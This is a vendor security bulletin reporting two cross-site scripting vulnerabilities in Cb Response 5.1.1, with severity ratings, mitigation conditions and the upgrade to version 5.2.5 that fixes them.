Access official resources from Carbon Black experts
Details:
Product | Cb Response |
Version Reported | 5.1.1 |
Version Resolved | 5.2.5 |
Severity Rating | High |
Exploitability | Low |
Remediation - Cloud | No Action - Cloud Customers Remediated 12/2016 |
Remediation - On Premise | Cb Response 5.2.5 available |
Two XSS vulnerabilities have been reported in Cb Response version 5.1.1. One reflected XSS and a second stored XSS in the user details. The vulnerabilities have been addressed in Cb Response 5.2.5. See the ‘Remediation’ section of this bulletin for details.
The XSS vulnerabilities are possible only under certain conditions, as documented in the ‘Mitigations’ section. There is no indication this vulnerability has been exploited in the wild.
The vulnerabilities were discovered by MWRInfoSecurity. We thank them for their support and partnership.
Rating Type | Rating |
Severity | High |
Exploitability | Low |
Severity is high because a successful exploitation can provide access to the Cb Response server equivalent to the compromised user. Exploitability is low because successful exploitation requires user interaction and the attacker have knowledge about server configuration.
If you are an on-premise deployment, these vulnerabilities are fully remediated by upgrading to Cb Response 5.2.5. Customers running all prior versions of the software are advised to upgrade.
The reflected XSS is only accessible by a user with global administrator privileges. To exploit either XSS vulnerability, an attacker must:
There are no immediate workarounds for these vulnerabilities. Customers should upgrade Cb Response servers to 5.2.5.
Copyright © 2005-2023 Broadcom. All Rights Reserved. The term “Broadcom” refers to Broadcom Inc. and/or its subsidiaries.